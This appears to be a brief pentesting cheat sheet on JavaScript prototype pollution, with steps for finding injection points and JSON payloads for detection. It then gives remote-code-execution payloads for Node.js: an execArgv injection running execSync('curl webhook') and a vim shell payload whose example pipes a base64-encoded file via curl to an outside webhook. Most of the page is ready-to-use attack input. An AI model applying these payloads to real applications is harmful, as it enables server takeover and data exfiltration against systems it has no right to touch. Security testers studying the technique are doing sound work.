Prototype Pollution
Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects.
name.__proto__
, name['__proto__']
, name.constructor.prototype
Steps:
Try different ways of adding an arbitrary property to
Object.prototype
. Try to inject an arbitrary property via the query string, URL fragment, and any JSON input. (es.__proto__[foo]=bar
-> In consoleObject.prototype.foo
)Identify a gadget property that allows you to execute arbitrary JavaScript.
Use DOM Invader and Server-Side Prototype Pollution Scanner.
More difficult to detect:
No source code access
Lack of developer tools
The DoS problem
Pollution persistence
POST
or PUT
requests that submit JSON data to an application or API are prime candidates
{
"user":"wiener",
"__proto__":{
"foo":"bar"
}
}
{
"user":"wiener",
"constructor":{
"prototype":{
"foo":"bar"
}
}
}
{
"username":"wiener",
"foo":"bar"
}
Detection
"__proto__": {
"json spaces": 10
}
// raw response.
"__proto__": {
"status": 412
}
// then trigger an error response with json body.
RCE
For identifying
"__proto__": {
"shell":"node",
"NODE_OPTIONS":"--inspect=webhook.com\"\".webhook\"\".com"
}
For exploit
"__proto__":{
"execArgv": [
"--eval=require('child_process').execSync('curl webhook')"
]
}
// find functionality that may spawn node child processes.
or
"__proto__":{
"shell":"vim",
"input":":! <command>\n"
// ex. -> ! cat /file | base64 | curl -d @- https://webhook\n"
}
// find functionality that may spawn node child processes.
Last updated
Was this helpful?